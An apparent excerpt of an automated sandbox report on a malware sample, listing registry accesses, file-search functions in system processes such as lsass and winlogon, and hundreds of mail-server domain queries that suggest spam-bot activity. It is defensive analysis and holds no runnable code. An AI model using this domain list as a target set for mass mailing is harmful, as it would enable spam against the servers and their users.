                      Source: C:\Users\user\AppData\Local\Temp\$77a3a3b4Key opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\TreatAsJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\$77a3a3b4Key opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\InprocServer32Jump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\$77a3a3b4Key opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\InprocHandler32Jump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\$77a3a3b4Key opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\InprocHandlerJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\$77a3a3b4Key opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\LocalServer32Jump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\$77a3a3b4Key opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\LocalServerJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\$77a3a3b4Key opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{0F87369F-A4E5-4CFC-BD3E-73E6154572DD}Jump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\$77a3a3b4Key opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\ElevationJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\$77a3a3b4Key opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{0F87369F-A4E5-4CFC-BD3E-73E6154572DD}Jump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\$77a3a3b4Key opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\TreatAsJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\$778e373eCode function: 6_2_00FDB19B FindFirstFileExW,6_2_00FDB19B
                      Source: C:\Windows\System32\dllhost.exeCode function: 7_2_000001B094E9E09C FindFirstFileExW,7_2_000001B094E9E09C
                      Source: C:\Windows\System32\winlogon.exeCode function: 8_2_000001E85898E09C FindFirstFileExW,8_2_000001E85898E09C
                      Source: C:\Windows\System32\lsass.exeCode function: 9_2_00000140AE86E09C FindFirstFileExW,9_2_00000140AE86E09C
                      Source: C:\Windows\System32\svchost.exeCode function: 10_2_00000195DD5CE09C FindFirstFileExW,10_2_00000195DD5CE09C
                      Source: C:\Windows\System32\svchost.exeCode function: 12_2_00000257E10AE09C FindFirstFileExW,12_2_00000257E10AE09C
                      Source: C:\Windows\System32\svchost.exeCode function: 13_2_000001F28C93E09C FindFirstFileExW,13_2_000001F28C93E09C
                      Source: C:\Windows\System32\svchost.exeCode function: 14_2_000001CA9854E09C FindFirstFileExW,14_2_000001CA9854E09C
                      Source: C:\Windows\System32\svchost.exeCode function: 15_2_000001D26531E09C FindFirstFileExW,15_2_000001D26531E09C
                      Source: C:\Windows\System32\svchost.exeCode function: 16_2_00000254A2D4E09C FindFirstFileExW,16_2_00000254A2D4E09C
                      Source: C:\Windows\System32\svchost.exeCode function: 17_2_0000024B87DDE09C FindFirstFileExW,17_2_0000024B87DDE09C
                      Source: C:\Windows\System32\svchost.exeCode function: 18_2_00000205FD40E09C FindFirstFileExW,18_2_00000205FD40E09C
                      Source: C:\Windows\System32\svchost.exeCode function: 19_2_000001A2056AE09C FindFirstFileExW,19_2_000001A2056AE09C

                      Networking

                      barindex
                      Source: C:\Windows\System32\svchost.exeDomain query: out.sonar.co.hu
                      Source: C:\Windows\System32\svchost.exeDomain query: smtp.rennes.inra.fr
                      Source: C:\Windows\System32\svchost.exeDomain query: smtp.a1.net
                      Source: C:\Windows\System32\svchost.exeDomain query: smtp.flt.khaitanpublicschool.com
                      Source: C:\Windows\System32\svchost.exeDomain query: smtp.acetec.es
                      Source: C:\Windows\System32\svchost.exeDomain query: smtp.shaw.ca
                      Source: C:\Windows\System32\svchost.exeDomain query: out.rsaweb.co.za
                      Source: C:\Windows\System32\svchost.exeDomain query: smtp.cimtel.net
                      Source: C:\Windows\System32\svchost.exeDomain query: smtp.postfund.com.cn
                      Source: C:\Windows\System32\svchost.exeDomain query: marriot.com
                      Source: C:\Windows\System32\svchost.exeDomain query: mx10.se.isp-net.nl
                      Source: C:\Windows\System32\svchost.exeDomain query: securesmtp.piramitgroup.org
                      Source: C:\Windows\System32\svchost.exeDomain query: out.caso.es
                      Source: C:\Windows\System32\svchost.exeDomain query: bisol-it.mail.protection.outlook.com
                      Source: C:\Windows\System32\svchost.exeDomain query: walla.com
                      Source: C:\Windows\System32\svchost.exeDomain query: alt2.aspmx.l.google.com
                      Source: C:\Windows\System32\svchost.exeDomain query: mail.lovefromaustralia.co.uk
                      Source: C:\Windows\System32\svchost.exeDomain query: out.xnodfu.com
                      Source: C:\Windows\System32\svchost.exeDomain query: out.host-41-196-190-143.static.link.com.eg
                      Source: C:\Windows\System32\svchost.exeDomain query: tpcompany.co.jp
                      Source: C:\Windows\System32\svchost.exeDomain query: hcmp.co.kr
                      Source: C:\Windows\System32\svchost.exeDomain query: izon-com.mail.protection.outlook.com
                      Source: C:\Windows\System32\svchost.exeDomain query: cdtm.de
                      Source: C:\Windows\System32\svchost.exeDomain query: mail.planet.nl
                      Source: C:\Windows\System32\svchost.exeDomain query: naoansiedade.com.br
                      Source: C:\Windows\System32\svchost.exeDomain query: zing.vn
                      Source: C:\Windows\System32\svchost.exeDomain query: smtp.ntlworld.com
                      Source: C:\Windows\System32\svchost.exeDomain query: secure.patrickdavid.de
                      Source: C:\Windows\System32\svchost.exeDomain query: securesmtp.robbievox.co.uk
                      Source: C:\Windows\System32\svchost.exeDomain query: mail.opsofis.com
                      Source: C:\Windows\System32\svchost.exeDomain query: povprint-com.mail.protection.outlook.com
                      Source: C:\Windows\System32\svchost.exeDomain query: audiomaster.es
                      Source: C:\Windows\System32\svchost.exeDomain query: smtp.ezysurf.co.nz
                      Source: C:\Windows\System32\svchost.exeDomain query: mail.ezz.de
                      Source: C:\Windows\System32\svchost.exeDomain query: smtp.ns.sympatico.ca
                      Source: C:\Windows\System32\svchost.exeDomain query: smtp.unigel.com.br
                      Source: C:\Windows\System32\svchost.exeDomain query: rogers.com
                      Source: C:\Windows\System32\svchost.exeDomain query: ghuitf.com
                      Source: C:\Windows\System32\svchost.exeDomain query: canesoverhere.com
                      Source: C:\Windows\System32\svchost.exeDomain query: upcmail.nl
                      Source: C:\Windows\System32\svchost.exeDomain query: out.teccart.online
                      Source: C:\Windows\System32\svchost.exeDomain query: smtp.telenet.be
                      Source: C:\Windows\System32\svchost.exeDomain query: geoanalize.lt
                      Source: C:\Windows\System32\svchost.exeDomain query: out.caledonian.ac.uk
                      Source: C:\Windows\System32\svchost.exeDomain query: mx0.dravanet.net
                      Source: C:\Windows\System32\svchost.exeDomain query: mx.xlxe.pl
                      Source: C:\Windows\System32\svchost.exeDomain query: hmajdal.tzafonet.org.il
                      Source: C:\Windows\System32\svchost.exeDomain query: out.thegreataunties.co.uk
                      Source: C:\Windows\System32\svchost.exeDomain query: smtp.seregon.com
                      Source: C:\Windows\System32\svchost.exeDomain query: ASPMX3.GOOGLEMAIL.COM
                      Source: C:\Windows\System32\svchost.exeDomain query: route1.mx.cloudflare.net
                      Source: C:\Windows\System32\svchost.exeDomain query: ybb.ne.jp
                      Source: C:\Windows\System32\svchost.exeDomain query: secure.ddfs.dsf
                      Source: C:\Windows\System32\svchost.exeDomain query: smtp.me.com
                      Source: C:\Windows\System32\svchost.exeDomain query: smtp.nifty.ne.jp
                      Source: C:\Windows\System32\svchost.exeDomain query: mail.qatar.net.qa
                      Source: C:\Windows\System32\svchost.exeDomain query: bunge-it.de
                      Source: C:\Windows\System32\svchost.exeDomain query: smtp.centrum.cz
                      Source: C:\Windows\System32\svchost.exeDomain query: out.mytrixtech.com
                      Source: C:\Windows\System32\svchost.exeDomain query: mx00.ionos.de
                      Source: C:\Windows\System32\svchost.exeDomain query: mail.rikkebruun.dk
                      Source: C:\Windows\System32\svchost.exeDomain query: securesmtp.jmichaelvinson.com
                      Source: C:\Windows\System32\svchost.exeDomain query: rozpedowscy.pl
                      Source: C:\Windows\System32\svchost.exeDomain query: smtp1d.netintelligence.com
                      Source: C:\Windows\System32\svchost.exeDomain query: smtp.bwana.org
                      Source: C:\Windows\System32\svchost.exeDomain query: secure.southeasternacademy.org
                      Source: C:\Windows\System32\svchost.exeDomain query: out.viasu.com
                      Source: C:\Windows\System32\svchost.exeDomain query: smtp.lachambre.be
                      Source: C:\Windows\System32\svchost.exeDomain query: securesmtp.fada.co.jp
                      Source: C:\Windows\System32\svchost.exeDomain query: smtp.heroofhealth.com
                      Source: C:\Windows\System32\svchost.exeDomain query: smtp.vermessungsseiten.de
                      Source: C:\Windows\System32\svchost.exeDomain query: wonder.ocn.ne.jp
                      Source: C:\Windows\System32\svchost.exeDomain query: nate.com
                      Source: C:\Windows\System32\svchost.exeDomain query: out.lykiabotanika.com
                      Source: C:\Windows\System32\svchost.exeDomain query: extensic.com
                      Source: C:\Windows\System32\svchost.exeDomain query: mail.reprobel.be
                      Source: C:\Windows\System32\svchost.exeDomain query: peoplepc.com
                      Source: C:\Windows\System32\svchost.exeDomain query: smtp.amtelecom.net
                      Source: C:\Windows\System32\svchost.exeDomain query: dr-thomas-maier.de
                      Source: C:\Windows\System32\svchost.exeDomain query: securesmtp.anystars.de
                      Source: C:\Windows\System32\svchost.exeDomain query: smtp.ciudad.com.ar
                      Source: C:\Windows\System32\svchost.exeDomain query: w0114c6a.kasserver.com
                      Source: C:\Windows\System32\svchost.exeDomain query: smtp.bbsyd.dk
                      Source: C:\Windows\System32\svchost.exeDomain query: yomar.ma
                      Source: C:\Windows\System32\svchost.exeDomain query: ccj.com
                      Source: C:\Windows\System32\svchost.exeDomain query: m.dogspot.in
                      Source: C:\Windows\System32\svchost.exeDomain query: smtp.17hotmayil.com
                      Source: C:\Windows\System32\svchost.exeDomain query: out.zgm.de
                      Source: C:\Windows\System32\svchost.exeDomain query: poczta.pl
                      Source: C:\Windows\System32\svchost.exeDomain query: smtp.stvnet.home.ne.jp
                      Source: C:\Windows\System32\svchost.exeDomain query: avweb.com
                      Source: C:\Windows\System32\svchost.exeDomain query: smtp.online.nl
                      Source: C:\Windows\System32\svchost.exeDomain query: yaho.de
                      Source: C:\Windows\System32\svchost.exeDomain query: newday-technology.co.uk
                      Source: C:\Windows\System32\svchost.exeDomain query: smtpin.rzone.de
                      Source: C:\Windows\System32\svchost.exeDomain query: wavedirect.nett.net
                      Source: C:\Windows\System32\svchost.exeDomain query: mail.absamail.co.za
                      Source: C:\Windows\System32\svchost.exeDomain query: mail.uniquedestinationsllc.com
                      Source: C:\Windows\System32\svchost.exeDomain query: morningnotes.com
                      Source: C:\Windows\System32\svchost.exeDomain query: zephyr.dti.ne.jp
                      Source: C:\Windows\System32\svchost.exeDomain query: beaumarisbooks.com.au
                      Source: C:\Windows\System32\svchost.exeDomain query: mail.hot.ee
                      Source: C:\Windows\System32\svchost.exeDomain query: smtp.ghuitf.com
                      Source: C:\Windows\System32\svchost.exeDomain query: smtp.bbox.fr
                      Source: C:\Windows\System32\svchost.exeDomain query: mx.netregistry.net
                      Source: C:\Windows\System32\svchost.exeDomain query: mail.hereiam.plus.com
                      Source: C:\Windows\System32\svchost.exeDomain query: smtp.secureserver.net
                      Source: C:\Windows\System32\svchost.exeDomain query: alt4.aspmx.l.google.com
                      Source: C:\Windows\System32\svchost.exeDomain query: alc.io
                      Source: C:\Windows\System32\svchost.exeDomain query: cometa21.it
                      Source: C:\Windows\System32\svchost.exeDomain query: eddwebs.com
                      Source: C:\Windows\System32\svchost.exeDomain query: smtp.cogeco.ca
                      Source: C:\Windows\System32\svchost.exeDomain query: smtp.iprimus.com.au
                      Source: C:\Windows\System32\svchost.exeDomain query: securesmtp.strath.ac.uk
                      Source: C:\Windows\System32\svchost.exeDomain query: smtp.virginmedia.com
                      Source: C:\Windows\System32\svchost.exeDomain query: peterboroughcab-org-uk.mail.protection.outlook.com
                      Source: C:\Windows\System32\svchost.exeDomain query: securesmtp.acicapital.com
                      Source: C:\Windows\System32\svchost.exeDomain query: secure.grandwayne.com
                      Source: C:\Windows\System32\svchost.exeDomain query: teletu.it
                      Source: C:\Windows\System32\svchost.exeDomain query: tinyworld.co.uk
                      Source: C:\Windows\System32\svchost.exeDomain query: smtp.centrum.sk
                      Source: C:\Windows\System32\svchost.exeDomain query: out.caistergolf.co.uk
                      Source: C:\Windows\System32\svchost.exeDomain query: smtp.skynet.be
                      Source: C:\Windows\System32\svchost.exeDomain query: nrl.pl
                      Source: C:\Windows\System32\svchost.exeDomain query: smtp.kabsi.at
                      Source: C:\Windows\System32\svchost.exeDomain query: mail.optimum.net
                      Source: C:\Windows\System32\svchost.exeDomain query: out.aumentarpenis.net
                      Source: C:\Windows\System32\svchost.exeDomain query: cilm.co.uk
                      Source: C:\Windows\System32\svchost.exeDomain query: securesmtp.sohns-ruit.de
                      Source: C:\Windows\System32\svchost.exeDomain query: emf.eei.uni-erlangen.de
                      Source: C:\Windows\System32\svchost.exeDomain query: mx.websitebod.com
                      Source: C:\Windows\System32\svchost.exeDomain query: securesmtp.agrotipp.hu
                      Source: C:\Windows\System32\svchost.exeDomain query: mstevens.com
                      Source: C:\Windows\System32\svchost.exeDomain query: smtp.rockfiend.co.uk
                      Source: C:\Windows\System32\svchost.exeDomain query: smtp.sccoast.net
                      Source: C:\Windows\System32\svchost.exeDomain query: tiscali.cz
                      Source: C:\Windows\System32\svchost.exeDomain query: tluh.com
                      Source: C:\Windows\System32\svchost.exeDomain query: mail.ranuccy.com.br
                      Source: C:\Windows\System32\svchost.exeDomain query: secure.helanta.sh
                      Source: C:\Windows\System32\svchost.exeDomain query: securesmtp.clubinternet.fr
                      Source: C:\Windows\System32\svchost.exeDomain query: smtp.hyacinthhouse.se
                      Source: C:\Windows\System32\svchost.exeDomain query: mx.giochi0.it
                      Source: C:\Windows\System32\svchost.exeDomain query: aspmx4.googlemail.com
                      Source: C:\Windows\System32\svchost.exeDomain query: mail.dynamicpayoff.com
                      Source: C:\Windows\System32\svchost.exeDomain query: i-dear2.de
                      Source: C:\Windows\System32\svchost.exeDomain query: secure.servicioscorporativos.mx
                      Source: C:\Windows\System32\svchost.exeDomain query: smtp.cardnet.co.jp
                      Source: C:\Windows\System32\svchost.exeDomain query: smtp.elhassociates.com
                      Source: C:\Windows\System32\svchost.exeDomain query: securesmtp.hexatech.com.my
                      Source: C:\Windows\System32\svchost.exeDomain query: smtp.frontier.com
                      Source: C:\Windows\System32\svchost.exeDomain query: smtp.gelsennet.de
                      Source: C:\Windows\System32\svchost.exeDomain query: muum.com.tr
                      Source: C:\Windows\System32\svchost.exeDomain query: chrislittell.com
                      Source: C:\Windows\System32\svchost.exeDomain query: augustakom.net
                      Source: C:\Windows\System32\svchost.exeDomain query: vera.com.uy
                      Source: C:\Windows\System32\svchost.exeDomain query: out.lollygaggeru.com
                      Source: C:\Windows\System32\svchost.exeDomain query: mx.convertor-3gp.com
                      Source: C:\Windows\System32\svchost.exeDomain query: pec.it
                      Source: C:\Windows\System32\svchost.exeDomain query: smtp.sps-co.jp
                      Source: C:\Windows\System32\svchost.exeDomain query: mail.paris-ag.com
                      Source: C:\Windows\System32\svchost.exeDomain query: mail.xtremexcavation.ca
                      Source: C:\Windows\System32\svchost.exeDomain query: smtp.capaci.de
                      Source: C:\Windows\System32\svchost.exeDomain query: docomo.ne.jp
                      Source: C:\Windows\System32\svchost.exeDomain query: out.mpost.co.nz
                      Source: C:\Windows\System32\svchost.exeDomain query: mail.marley.de
                      Source: C:\Windows\System32\svchost.exeDomain query: smtp.southeastrec.co.uk
                      Source: C:\Windows\System32\svchost.exeDomain query: mail.frigus.eu
                      Source: C:\Windows\System32\svchost.exeDomain query: mail.windstream.net
                      Source: C:\Windows\System32\svchost.exeDomain query: sunrise.ch
                      Source: C:\Windows\System32\svchost.exeDomain query: dvc.vn
                      Source: C:\Windows\System32\svchost.exeDomain query: smtp.marginalis.se
                      Source: C:\Windows\System32\svchost.exeDomain query: smtp.tmd-tunelmuhendisligi.com
                      Source: C:\Windows\System32\svchost.exeDomain query: mail.bpmconsultants.in
                      Source: C:\Windows\System32\svchost.exeDomain query: out.clements1975.fslife.co.uk
                      Source: C:\Windows\System32\svchost.exeDomain query: spektrum.ca
                      Source: C:\Windows\System32\svchost.exeDomain query: out.grupo-neo.com
                      Source: C:\Windows\System32\svchost.exeDomain query: smtp.aueb.gr
                      Source: C:\Windows\System32\svchost.exeDomain query: mx.generic-isp.com
                      Source: C:\Windows\System32\svchost.exeDomain query: mail.i.ua
                      Source: C:\Windows\System32\svchost.exeDomain query: out.theploughinn.co.uk
                      Source: C:\Windows\System32\svchost.exeDomain query: smtp.ms-scorpio.de
                      Source: C:\Windows\System32\svchost.exeDomain query: out.exois.com
                      Source: C:\Windows\System32\svchost.exeDomain query: out.tamkinhochberg.com
                      Source: C:\Windows\System32\svchost.exeDomain query: mail.moenchs-waldhotel.de
                      Source: C:\Windows\System32\svchost.exeDomain query: smtp.apotecbay.com
                      Source: C:\Windows\System32\svchost.exeDomain query: mx2c28.carrierzone.com
                      Source: C:\Windows\System32\svchost.exeDomain query: out.e-olympics.de
                      Source: C:\Windows\System32\svchost.exeDomain query: out.selfcateringinknysna.com
                      Source: C:\Windows\System32\svchost.exeDomain query: securesmtp.oita.jtuc-rengo.jp
                      Source: C:\Windows\System32\svchost.exeDomain query: cloud15.spamtitan.com
                      Source: C:\Windows\System32\svchost.exeDomain query: mail.techsolutionscanada.com
                      Source: C:\Windows\System32\svchost.exeDomain query: smtp.mairie-habsheim.de
                      Source: C:\Windows\System32\svchost.exeDomain query: securesmtp.ding.com
                      Source: C:\Windows\System32\svchost.exeDomain query: ceti.pl
                      Source: C:\Windows\System32\svchost.exeDomain query: secure.rlmorgan.co.uk
                      Source: C:\Windows\System32\svchost.exeDomain query: secure.allianceinsurance.in
                      Source: C:\Windows\System32\svchost.exeDomain query: bhs-is.mail.protection.outlook.com
                      Source: C:\Windows\System32\svchost.exeDomain query: interia.eu
                      Source: C:\Windows\System32\svchost.exeDomain query: mail.casadociclista.net.br
                      Source: C:\Windows\System32\svchost.exeDomain query: secure.pflege.de
                      Source: C:\Windows\System32\svchost.exeDomain query: smtp.jcom.home.ne.jp
                      Source: C:\Windows\System32\svchost.exeDomain query: heidester.com
                      Source: C:\Windows\System32\svchost.exeDomain query: smtp.hughes.net
                      Source: C:\Windows\System32\svchost.exeDomain query: mail.fivefigureweeks.com
                      Source: C:\Windows\System32\svchost.exeDomain query: out.gemicomp.com.ar
                      Source: C:\Windows\System32\svchost.exeDomain query: mail.firstfriends.com
                      Source: C:\Windows\System32\svchost.exeDomain query: smtp.inwind.it
                      Source: C:\Windows\System32\svchost.exeDomain query: out.clayton.k.ga.us
                      Source: C:\Windows\System32\svchost.exeDomain query: out.web-schaaf.de
                      Source: C:\Windows\System32\svchost.exeDomain query: smtp.laser.com.br
                      Source: C:\Windows\System32\svchost.exeDomain query: vermesser.de
                      Source: C:\Windows\System32\svchost.exeDomain query: out.gammu.de
                      Source: C:\Windows\System32\svchost.exeDomain query: out.credibo.it
                      Source: C:\Windows\System32\svchost.exeDomain query: mx.abcnetworkingu.pl
                      Source: C:\Windows\System32\svchost.exeDomain query: securesmtp.testroamright.com
                      Source: C:\Windows\System32\svchost.exeDomain query: smtp.pinnaclesettlements.com
                      Source: C:\Windows\System32\svchost.exeDomain query: lykal.com
                      Source: C:\Windows\System32\svchost.exeDomain query: securesmtp.mandres.de
                      Source: C:\Windows\System32\svchost.exeDomain query: securesmtp.lebcedars.com
                      Source: C:\Windows\System32\svchost.exeDomain query: securesmtp.bleisetzer.de
                      Source: C:\Windows\System32\svchost.exeDomain query: dzv-netz.de
                      Source: C:\Windows\System32\svchost.exeDomain query: out.arenaholidays.net
                      Source: C:\Windows\System32\svchost.exeDomain query: lfsvechta.de
                      Source: C:\Windows\System32\svchost.exeDomain query: mx.gfgfgf.org
                      Source: C:\Windows\System32\svchost.exeDomain query: smtp.bindifencing.com.au
                      Source: C:\Windows\System32\svchost.exeDomain query: smtp.ldbcargas.com.br
                      Source: C:\Windows\System32\svchost.exeDomain query: laudioikastola.net
                      Source: C:\Windows\System32\svchost.exeDomain query: smtp.etica.conc-bmw.com
                      Source: C:\Windows\System32\svchost.exeDomain query: smtp.netines.net
                      Source: C:\Windows\System32\svchost.exeDomain query: womenjapan.com
                      Source: C:\Windows\System32\svchost.exeDomain query: smtp-01.tld.t-online.de
                      Source: C:\Windows\System32\svchost.exeDomain query: smtp.virgin.net
                      Source: C:\Windows\System32\svchost.exeDomain query: kefgames.net
                      Source: C:\Windows\System32\svchost.exeDomain query: digcom-ca.mail.protection.outlook.com
                      Source: C:\Windows\System32\svchost.exeDomain query: mx.fkksol.com
                      Source: C:\Windows\System32\svchost.exeDomain query: out.csgs.com
                      Source: C:\Windows\System32\svchost.exeDomain query: securesmtp.saluscm.pl
                      Source: C:\Windows\System32\svchost.exeDomain query: smtp.grafikdev.com
                      Source: C:\Windows\System32\svchost.exeDomain query: autograf.pl
                      Source: C:\Windows\System32\svchost.exeDomain query: secure.milaus.net
                      Source: C:\Windows\System32\svchost.exeDomain query: ms5.ncv.ne.jp
                      Source: C:\Windows\System32\svchost.exeDomain query: smtp.xplornet.ca
                      Source: C:\Windows\System32\svchost.exeDomain query: mail.hif.com
                      Source: C:\Windows\System32\svchost.exeDomain query: out.theoxfordhotel.com.au
                      Source: C:\Windows\System32\svchost.exeDomain query: smtp.centurylink.net
                      Source: C:\Windows\System32\svchost.exeDomain query: aqua.daa.jp
                      Source: C:\Windows\System32\svchost.exeDomain query: out.bysources.com
                      Source: C:\Windows\System32\svchost.exeDomain query: secure.lcampino.cl
                      Source: C:\Windows\System32\svchost.exeDomain query: smtp.ucr.ac.cr
                      Source: C:\Windows\System32\svchost.exeDomain query: securesmtp.fluid.demon.co.uk
                      Source: C:\Windows\System32\svchost.exeDomain query: mail.skidfamily.com
                      Source: C:\Windows\System32\svchost.exeDomain query: out.hotmy.fr
                      Source: C:\Windows\System32\svchost.exeDomain query: smtp.irvineproject.cn
                      Source: C:\Windows\System32\svchost.exeDomain query: mail.desomniac.com
                      Source: C:\Windows\System32\svchost.exeDomain query: mx0.uniserve.com
                      Source: C:\Windows\System32\svchost.exeDomain query: noos.fr
                      Source: C:\Windows\System32\svchost.exeDomain query: mx.adephia.net
                      Source: C:\Windows\System32\svchost.exeDomain query: smtp.q.com
                      Source: C:\Windows\System32\svchost.exeDomain query: cefnogi.com
                      Source: C:\Windows\System32\svchost.exeDomain query: cssd.org
                      Source: C:\Windows\System32\svchost.exeDomain query: hofmann-geraberg.de
                      Source: C:\Windows\System32\svchost.exeDomain query: smtp.ig.com.br
                      Source: C:\Windows\System32\svchost.exeDomain query: securesmtp.begames.com
                      Source: C:\Windows\System32\svchost.exeDomain query: mail.atlanticbb.net
                      Source: C:\Windows\System32\svchost.exeDomain query: smtp.y4hoo.com
                      Source: C:\Windows\System32\svchost.exeDomain query: lengau.info.bw
                      Source: C:\Windows\System32\svchost.exeDomain query: mx3.ovh.net
                      Source: C:\Windows\System32\svchost.exeDomain query: smtp.barbassa.com.br
                      Source: C:\Windows\System32\svchost.exeDomain query: smtp.avis.cl
                      Source: C:\Windows\System32\svchost.exeDomain query: out.rostele.com
                      Source: C:\Windows\System32\svchost.exeDomain query: numeo.fr
                      Source: C:\Windows\System32\svchost.exeDomain query: oapv.cz
                      Source: C:\Windows\System32\svchost.exeDomain query: constelacionesmadrid.com
                      Source: C:\Windows\System32\svchost.exeDomain query: smtp.ezweb.ne.jp
                      Source: C:\Windows\System32\svchost.exeDomain query: mail.casscomm.com
                      Source: C:\Windows\System32\svchost.exeDomain query: secure.shortlinesales.com
                      Source: C:\Windows\System32\svchost.exeDomain query: smtp.citromail.hu
                      Source: C:\Windows\System32\svchost.exeDomain query: secure.framgangsrikaforetag.se
                      Source: C:\Windows\System32\svchost.exeDomain query: smtp.oldenglishchurch.org.uk
                      Source: C:\Windows\System32\svchost.exeDomain query: securesmtp.wtqudu.com
                      Source: C:\Windows\System32\svchost.exeDomain query: out.tecdev.it
                      Source: C:\Windows\System32\svchost.exeDomain query: mail.americanaugers.jp
                      Source: C:\Windows\System32\svchost.exeDomain query: ozonekayak-com.mail.protection.outlook.com
                      Source: C:\Windows\System32\svchost.exeDomain query: mx-1.dpoczta.pl
                      Source: C:\Windows\System32\svchost.exeDomain query: smtp.netzero.net
                      Source: C:\Windows\System32\svchost.exeDomain query: secure.mchscares.org
                      Source: C:\Windows\System32\svchost.exeDomain query: securesmtp.tempcloud.info
                      Source: C:\Windows\System32\svchost.exeDomain query: grafmueller-schuhe.de
                      Source: C:\Windows\System32\svchost.exeDomain query: mail.dolores.art.br
                      Source: C:\Windows\System32\svchost.exeDomain query: mail.venter.com.br
                      Source: C:\Windows\System32\svchost.exeDomain query: smtp.netzero.com
                      Source: C:\Windows\System32\svchost.exeDomain query: viha.ca
                      Source: C:\Windows\System32\svchost.exeDomain query: out.therightweigh.co.uk
                      Source: C:\Windows\System32\svchost.exeDomain query: mail.optonline.net
                      Source: C:\Windows\System32\svchost.exeDomain query: smtp.ivan-elkin.name
                      Source: C:\Windows\System32\svchost.exeDomain query: mail.dk
                      Source: C:\Windows\System32\svchost.exeDomain query: out.vanwoerdekom.nl
                      Source: C:\Windows\System32\svchost.exeDomain query: mail.eclplastics.co.uk
                      Source: C:\Windows\System32\svchost.exeDomain query: out.multicopia360.com
                      Source: C:\Windows\System32\svchost.exeDomain query: telefonica.net
                      Source: C:\Windows\System32\svchost.exeDomain query: out.internet.club.ne.jp
                      Source: C:\Windows\System32\svchost.exeDomain query: d178078a.ess.barracudanetworks.com
                      Source: C:\Windows\System32\svchost.exeDomain query: in4.sk
                      Source: C:\Windows\System32\svchost.exeDomain query: airrivals.pl
                      Source: C:\Windows\System32\svchost.exeDomain query: gruesshaber.de
                      Source: C:\Windows\System32\svchost.exeDomain query: mx2.321.com
                      Source: C:\Windows\System32\svchost.exeDomain query: tvsnaples.org
                      Source: C:\Windows\System32\svchost.exeDomain query: securesmtp.polar-transport.cz
                      Source: C:\Windows\System32\svchost.exeDomain query: securesmtp.mjbelda.com
                      Source: C:\Windows\System32\svchost.exeDomain query: out.cotamicro.com.br
                      Source: C:\Windows\System32\svchost.exeDomain query: wss-docs.co.uk
                      Source: C:\Windows\System32\svchost.exeDomain query: smtp.integrapost.cl
                      Source: C:\Windows\System32\svchost.exeDomain query: smtp.atlanticexpress.ca
                      Source: C:\Windows\System32\svchost.exeDomain query: mail.futterplatzerl.com
                      Source: C:\Windows\System32\svchost.exeDomain query: smtp.hacked.de
                      Source: C:\Windows\System32\svchost.exeDomain query: secure.limpec.com.br
                      Source: C:\Windows\System32\svchost.exeDomain query: out.shop-e-nfinite.com
                      Source: C:\Windows\System32\svchost.exeDomain query: out.hightelecom.com
                      Source: C:\Windows\System32\svchost.exeDomain query: i.softbank.jp
                      Source: C:\Windows\System32\svchost.exeDomain query: btconnect.com
                      Source: C:\Windows\System32\svchost.exeDomain query: mail.bresnan.net
                      Source: C:\Windows\System32\svchost.exeDomain query: securesmtp.mamasimon.de
                      Source: C:\Windows\System32\svchost.exeDomain query: smtp.freemail.hu
                      Source: C:\Windows\System32\svchost.exeDomain query: hooter.com
                      Source: C:\Windows\System32\svchost.exeDomain query: imsinc01.filter2.lastspam.com
                      Source: C:\Windows\System32\svchost.exeDomain query: softbank.ne.jp
                      Source: C:\Windows\System32\svchost.exeDomain query: virtualworkforcepro.com
                      Source: C:\Windows\System32\svchost.exeDomain query: smtp.sputtr.com
                      Source: C:\Windows\System32\svchost.exeDomain query: out.emarki.com.br
                      Source: C:\Windows\System32\svchost.exeDomain query: mail.milenio.com
                      Source: C:\Windows\System32\svchost.exeDomain query: 94c8b50eb70aa4c8.com
                      Source: C:\Windows\System32\svchost.exeDomain query: cajememotors.com
                      Source: C:\Windows\System32\svchost.exeDomain query: mx1.ovh.net
                      Source: C:\Windows\System32\svchost.exeDomain query: aspmx2.googlemail.com
                      Source: C:\Windows\System32\svchost.exeDomain query: bulkeley.navy.mil
                      Source: C:\Windows\System32\svchost.exeDomain query: dominy.f9.co.uk
                      Source: C:\Windows\System32\svchost.exeDomain query: secure.apollosouth.com
                      Source: C:\Windows\System32\svchost.exeDomain query: proxmea.com
                      Source: C:\Windows\System32\svchost.exeDomain query: mail.uchisyakyo.jp
                      Source: C:\Windows\System32\svchost.exeDomain query: out.rapeli.de
                      Source: C:\Windows\System32\svchost.exeDomain query: secure.stein-druck.de
                      Source: C:\Windows\System32\svchost.exeDomain query: test789.fr
                      Source: C:\Windows\System32\svchost.exeDomain query: smtp.oaktreefinancial.ca
                      Source: C:\Windows\System32\svchost.exeDomain query: fsmail.net
                      Source: C:\Windows\System32\svchost.exeDomain query: secure.sayclub.com
                      Source: C:\Windows\System32\svchost.exeDomain query: secure.brpindustries.com.au
